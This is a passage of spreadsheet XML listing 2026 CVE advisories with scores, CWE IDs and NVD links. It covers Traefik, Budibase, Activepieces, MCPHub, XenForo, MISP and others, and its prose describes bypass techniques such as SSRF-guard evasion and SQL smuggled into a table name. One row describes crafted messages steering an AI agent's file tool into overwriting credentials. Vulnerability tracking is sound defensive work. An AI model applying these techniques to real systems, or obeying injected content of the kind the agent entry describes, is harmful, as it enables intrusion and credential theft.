      <c r="L2464" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in the Oracle Product Lifecycle Analytics product of Oracle Supply Chain (component: Installation Issues).   The supported version that is affected is 3.6.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Product Lifecycle Analytics.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle Product Lifecycle Analytics accessible data as well as  unauthorized update, insert or delete access to some of Oracle Product Lifecycle Analytics accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Product Lifecycle Analytics. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L).</t>
        </is>
      </c>
      <c r="M2464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71048</t>
        </is>
      </c>
    </row>
    <row r="2465">
      <c r="A2465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71327</t>
        </is>
      </c>
      <c r="C2465" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2465" s="5" t="inlineStr"/>
      <c r="F2465" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2465" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2465" s="5" t="inlineStr"/>
      <c r="I2465" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2465" s="5" t="inlineStr"/>
      <c r="K2465" s="5" t="inlineStr">
        <is>
          <t>CWE-694</t>
        </is>
      </c>
      <c r="L2465" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 3.0.0 until 3.6.25 and 3.7.10, Traefik's Kubernetes Gateway API provider in pkg/provider/kubernetes/gateway/httproute.go, grpcroute.go, tcproute.go, and tlsroute.go builds HTTPRoute, GRPCRoute, TCPRoute, and TLSRoute router and service identities by hyphen-concatenating namespace, route name, Gateway identity, entry point, and rule index, allowing colliding Routes to overwrite another namespace's backend. This issue is fixed in 3.6.25 and 3.7.10.</t>
        </is>
      </c>
      <c r="M2465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71327</t>
        </is>
      </c>
    </row>
    <row r="2466">
      <c r="A2466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72835</t>
        </is>
      </c>
      <c r="C2466" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2466" s="5" t="inlineStr"/>
      <c r="F2466" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2466" s="5" t="inlineStr"/>
      <c r="H2466" s="5" t="inlineStr"/>
      <c r="I2466" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J2466" s="5" t="inlineStr"/>
      <c r="K2466" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="L2466" s="5" t="inlineStr">
        <is>
          <t>filebrowser versions before v2.63.21 fail to canonicalize paths before evaluating access rules, allowing authenticated users to bypass administrator-defined deny rules using case-variant or backslash-separated paths. Attackers can request files with alternate path representations that match no rule but resolve to the same filesystem object, gaining unauthorized access to denied files within their scope.</t>
        </is>
      </c>
      <c r="M2466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72835</t>
        </is>
      </c>
    </row>
    <row r="2467">
      <c r="A2467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73083</t>
        </is>
      </c>
      <c r="C2467" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2467" s="5" t="inlineStr"/>
      <c r="F2467" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2467" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2467" s="5" t="inlineStr"/>
      <c r="I2467" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2467" s="5" t="inlineStr"/>
      <c r="K2467" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2467" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.80.0, in SANDBOX_CODE_ONLY mode, the engine loads the compiled user module with importFresh(), a wrapper around Node.js require(), before the V8 isolate is applied. Top-level module code can therefore call require('child_process'), access fs, and use other Node.js APIs in the host engine process outside the sandbox. An authenticated user who can create a Code step can read environment secrets including AP_ENCRYPTION_KEY and AP_JWT_SECRET, read or write files, and reach internal services. This issue is fixed in version 0.80.0.</t>
        </is>
      </c>
      <c r="M2467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73083</t>
        </is>
      </c>
    </row>
    <row r="2468">
      <c r="A2468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73264</t>
        </is>
      </c>
      <c r="C2468" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2468" s="5" t="inlineStr"/>
      <c r="F2468" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2468" s="5" t="inlineStr"/>
      <c r="H2468" s="5" t="inlineStr"/>
      <c r="I2468" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2468" s="5" t="inlineStr"/>
      <c r="K2468" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2468" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.33.1, an authenticated user with Lighthouse provider configuration access could supply an unvalidated base_url for the openai_compatible provider through POST /api/v1/lighthouse/providers and POST /api/v1/lighthouse/providers/{id}/connection, causing api/src/backend/tasks/jobs/lighthouse_providers.py to send outbound requests, including the API key in the Authorization header, to attacker-controlled or internal endpoints when client.models.list was called. This issue is fixed in version 5.33.1.</t>
        </is>
      </c>
      <c r="M2468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73264</t>
        </is>
      </c>
    </row>
    <row r="2469">
      <c r="A2469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73313</t>
        </is>
      </c>
      <c r="C2469" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2469" s="5" t="inlineStr"/>
      <c r="F2469" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2469" s="5" t="inlineStr"/>
      <c r="H2469" s="5" t="inlineStr"/>
      <c r="I2469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2469" s="5" t="inlineStr"/>
      <c r="K2469" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2469" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a multi-factor authentication bypass vulnerability in the passkey TFA provider that allows an authenticated attacker to complete login as another user by submitting their own registered passkey credential during the WebAuthn assertion step. The passkey verification path performs a global credential lookup without validating that the matched credential belongs to the user whose login is pending, enabling an attacker who knows a target account's password to sign the challenge with their own passkey and bypass multi-factor authentication on both public forum and ACP login paths.</t>
        </is>
      </c>
      <c r="M2469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t>
        </is>
      </c>
    </row>
    <row r="2470">
      <c r="A2470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73408</t>
        </is>
      </c>
      <c r="C2470" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2470" s="5" t="inlineStr"/>
      <c r="F2470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2470" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H2470" s="5" t="inlineStr"/>
      <c r="I2470" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2470" s="5" t="inlineStr"/>
      <c r="K2470" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2470" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.18, packages/server/src/integrations/mysql.ts enabled multipleStatements and inserted an unescaped tableName into a DESCRIBE statement. An attacker able to create a MySQL table with a backtick and stacked statement in its name could wait for a Budibase administrator to run schema discovery, causing the second statement to execute. The fix applies quoteMySqlIdentifier before constructing the query. This issue is fixed in version 3.39.18.</t>
        </is>
      </c>
      <c r="M2470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73408</t>
        </is>
      </c>
    </row>
    <row r="2471">
      <c r="A2471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73611</t>
        </is>
      </c>
      <c r="C2471" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2471" s="5" t="inlineStr"/>
      <c r="F2471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2471" s="5" t="inlineStr"/>
      <c r="H2471" s="5" t="inlineStr"/>
      <c r="I2471" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2471" s="5" t="inlineStr"/>
      <c r="K2471" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2471" s="5" t="inlineStr">
        <is>
          <t>File Browser versions from 2.50.0 through 2.63.21 fail to validate JWT expiration when proxy authentication is configured with a non-default logout page. Attackers with a previously valid token can access protected routes and administrative endpoints indefinitely, and exchange expired tokens for fresh ones via the renewal endpoint.</t>
        </is>
      </c>
      <c r="M2471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73611</t>
        </is>
      </c>
    </row>
    <row r="2472">
      <c r="A2472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77110</t>
        </is>
      </c>
      <c r="C2472" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2472" s="5" t="inlineStr"/>
      <c r="F2472" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2472" s="5" t="inlineStr"/>
      <c r="H2472" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I2472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2472" s="5" t="inlineStr"/>
      <c r="K2472" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2472" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M2472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t>
        </is>
      </c>
    </row>
    <row r="2473">
      <c r="A2473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77368</t>
        </is>
      </c>
      <c r="C2473" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2473" s="5" t="inlineStr"/>
      <c r="F2473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2473" s="5" t="inlineStr"/>
      <c r="H2473" s="5" t="inlineStr"/>
      <c r="I2473" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2473" s="5" t="inlineStr"/>
      <c r="K2473" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2473" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In version 4.39, the filer's TUS resumable-upload handler checks JWT allowed_prefixes scoping only when a session is created, letting a low-privilege tenant hijack another tenant's upload session to write content to filer paths their own token forbids. The HEAD, PATCH, and DELETE verbs that act on an existing session by its id never verify that the session's stored target path falls within the caller's allowed prefixes, so a tenant who obtains another upload's session identifier can PATCH attacker bytes into it and, on completion, have the file land at the victim's out-of-scope path. The same token can also DELETE other tenants' sessions and HEAD them to read upload progress and size, defeating the JWT prefix isolation. This vulnerability only affects deployments that configure filer JWT signing and have TUS uploads enabled. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="M2473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77368</t>
        </is>
      </c>
    </row>
    <row r="2474">
      <c r="A2474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79639</t>
        </is>
      </c>
      <c r="C2474" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2474" s="5" t="inlineStr"/>
      <c r="F2474" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2474" s="5" t="inlineStr"/>
      <c r="H2474" s="5" t="inlineStr"/>
      <c r="I2474" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2474" s="5" t="inlineStr"/>
      <c r="K2474" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2474"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2474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79639</t>
        </is>
      </c>
    </row>
    <row r="2475">
      <c r="A2475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79749</t>
        </is>
      </c>
      <c r="C2475" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2475" s="5" t="inlineStr"/>
      <c r="F2475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2475" s="5" t="inlineStr"/>
      <c r="H2475" s="5" t="inlineStr"/>
      <c r="I2475" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2475" s="5" t="inlineStr"/>
      <c r="K2475" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2475" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, MCPHub's SSRF guard in src/utils/ssrf.ts uses a custom isBlockedIpv6 function that only checks for loopback, link-local, unique-local, IPv4-mapped, and IPv4-compatible IPv6 addresses. IPv6 transition address families -- NAT64 (64:ff9b::/96), 6to4 (2002::/16), and Teredo (2001::/32) -- are not checked. An attacker who can specify a URL for an MCP server connection can encode a private IPv4 address inside one of these IPv6 forms to bypass the SSRF guard and reach internal infrastructure. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="M2475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79749</t>
        </is>
      </c>
    </row>
    <row r="2476">
      <c r="A2476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80182</t>
        </is>
      </c>
      <c r="C2476" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2476" s="5" t="inlineStr"/>
      <c r="F2476" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2476" s="5" t="inlineStr"/>
      <c r="H2476" s="5" t="inlineStr"/>
      <c r="I2476" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2476" s="5" t="inlineStr"/>
      <c r="K2476" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2476" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, tokens obtained via OAuth1 access token, application credential, or trust-scoped authentication could create new long-lived credentials or authorize new delegations that persist independently of, and outlive, the credential used to obtain them. The delegation restrictions that block these operations did not consistently apply to all delegated token types, allowing an OAuth1-scoped token, for example, to create application credentials or authorize OAuth1 request tokens despite those operations being restricted for other delegated token types. All Keystone deployments that permit delegated authentication through OAuth1 access tokens, application credentials, or trusts are affected.</t>
        </is>
      </c>
      <c r="M2476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80182</t>
        </is>
      </c>
    </row>
    <row r="2477">
      <c r="A2477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82020</t>
        </is>
      </c>
      <c r="C2477" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2477" s="5" t="inlineStr"/>
      <c r="F2477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2477" s="5" t="inlineStr"/>
      <c r="H2477" s="5" t="inlineStr"/>
      <c r="I2477" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2477" s="5" t="inlineStr"/>
      <c r="K2477" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L2477" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.16.0 prior to 0.17.0 contains an improper path restriction vulnerability that allows attackers who can influence ingested message content to overwrite the credential store by bypassing sensitive-path guards that excluded the auth.json file. Attackers can craft malicious messages directing the agent's file-write tooling to overwrite the credential store without triggering any path-based protection, enabling credential tampering or unauthorized access.</t>
        </is>
      </c>
      <c r="M2477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82020</t>
        </is>
      </c>
    </row>
    <row r="2478">
      <c r="A2478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="C2478" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2478" s="5" t="inlineStr"/>
      <c r="F2478" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2478" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H2478" s="5" t="inlineStr"/>
      <c r="I2478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2478" s="5" t="inlineStr"/>
      <c r="K2478" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2478" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="M2478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="2479">
      <c r="A2479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85197</t>
        </is>
      </c>
      <c r="C2479" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2479" s="5" t="inlineStr"/>
      <c r="F2479" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2479" s="5" t="inlineStr"/>
      <c r="H2479" s="5" t="inlineStr"/>
      <c r="I2479" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2479" s="5" t="inlineStr"/>
      <c r="K2479" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2479" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libsoup. A malicious HTTP/2 server or a Man-in-the-Middle (MITM) attacker can exploit a heap use-after-free vulnerability in the HTTP/2 client implementation. This occurs when a GNOME application uploads a file using HTTP/2, and the server sends a GOAWAY frame while the file body is being read asynchronously. This can lead to memory corruption, potentially resulting in information disclosure or arbitrary code execution.</t>
        </is>
      </c>
      <c r="M2479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85197</t>
        </is>
      </c>
    </row>
    <row r="2480">
      <c r="A2480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85221</t>
        </is>
      </c>
      <c r="C2480" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2480" s="5" t="inlineStr"/>
      <c r="F2480" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2480" s="5" t="inlineStr"/>
      <c r="H2480" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I2480" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2480" s="5" t="inlineStr"/>
      <c r="K2480" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2480" s="5" t="inlineStr">
        <is>
          <t>MISP contains an improper TLS certificate validation vulnerability in CurlClient. The CurlClient::$verifyPeer property was not explicitly initialized and therefore defaulted to null. When passed to cURL, this value effectively disabled TLS peer verification unless the calling code explicitly enabled it.
As a result, HTTPS connections made through affected CurlClient instances could accept certificates that were not issued by a trusted certificate authority. An attacker capable of intercepting or manipulating network traffic between a MISP instance and a remote HTTPS service could impersonate the remote endpoint and perform a man-in-the-middle attack.
Successful exploitation could allow an attacker to observe sensitive information transmitted by MISP, including authentication material or exchanged threat intelligence, and to modify responses returned to the MISP instance. The impact depends on the functionality using CurlClient and the data exchanged with the remote service.
The patch enables TLS peer verification by default while preserving explicit support for configured self-signed certificates. It also corrects the self-signed certificate handling in SyncTool so that peer verification is disabled only when no pinned CA certificate is configured.</t>
        </is>
      </c>
      <c r="M2480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85221</t>
        </is>
      </c>
    </row>
    <row r="2481">
      <c r="A2481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85533</t>
        </is>
      </c>
      <c r="C2481" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2481" s="5" t="inlineStr"/>
      <c r="F2481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2481" s="5" t="inlineStr"/>
      <c r="H2481" s="5" t="inlineStr"/>
      <c r="I2481" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2481" s="5" t="inlineStr"/>
      <c r="K2481" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2481" s="5" t="inlineStr">
        <is>
          <t>An authorization flaw in MISP allowed an authenticated user to submit a sharing_group_id without verifying that the user was authorized to use the referenced Sharing Group.
In several attribute and Galaxy Cluster creation and editing workflows, validation of the submitted Sharing Group was performed only when the request explicitly set the distribution field to 4 ("Sharing Group"). An attacker could therefore craft a request containing a sharing_group_id while omitting the distribution parameter, or otherwise avoiding the distribution == 4 condition, causing the Sharing Group authorization check to be skipped.
This could allow a user with permission to create or modify the affected MISP objects to associate data with a Sharing Group that they are not authorized to use. Depending on the affected object's existing distribution settings and subsequent processing, this could bypass intended information-sharing boundaries and result in unauthorized placement or distribution of data to members of another Sharing Group.
The issue affected attribute attachment and editing operations as well as Galaxy Cluster creation and editing. The fix ensures that authorization is performed whenever a non-empty sharing_group_id is submitted, independently of the distribution parameter. It also centralizes the authorization decision in SharingGroup::canUse() and explicitly rejects empty Sharing Group identifiers rather than allowing them to be interpreted as an unrestricted query.</t>
        </is>
      </c>
      <c r="M2481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85533</t>
        </is>
      </c>
    </row>
    <row r="2482">
      <c r="A2482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2482" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44319</t>
        </is>
      </c>
      <c r="C2482" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2482" s="5" t="inlineStr"/>
      <c r="F2482" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2482" s="5" t="inlineStr"/>
      <c r="H2482" s="5" t="inlineStr"/>
      <c r="I2482" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2482" s="5" t="inlineStr"/>
      <c r="K2482" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2482" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone 1 and AR.Drone 2 are vulnerable to Denial of Service. The Parrot AR.Drone platform is vulnerable to Wi-Fi deauthentication attack, allowing remote and unauthenticated attackers to disconnect drone from controller during mid-flight.</t>
        </is>
      </c>
      <c r="M2482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44319</t>
        </is>
      </c>
    </row>
    <row r="2483">
      <c r="A2483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2483" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44320</t>
        </is>
      </c>
      <c r="C2483" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2483" s="5" t="inlineStr"/>
      <c r="F2483" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2483" s="5" t="inlineStr"/>
      <c r="H2483" s="5" t="inlineStr"/>
      <c r="I2483" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2483" s="5" t="inlineStr"/>
      <c r="K2483" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2483" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone version 1 and 2 does not employ a suitable mechanism to prevent denial-of-service (DoS) attacks. An attacker can harm the device availability (i.e., video streaming and control) by using tool to perform an IPv4 flood attack. Verified attacks includes SYN flooding and UDP flooding.</t>
        </is>
      </c>
      <c r="M2483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44320</t>
        </is>
      </c>
    </row>
    <row r="2484">
      <c r="A2484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2484" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-23173</t>
        </is>
      </c>
      <c r="C2484" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2484" s="5" t="inlineStr"/>
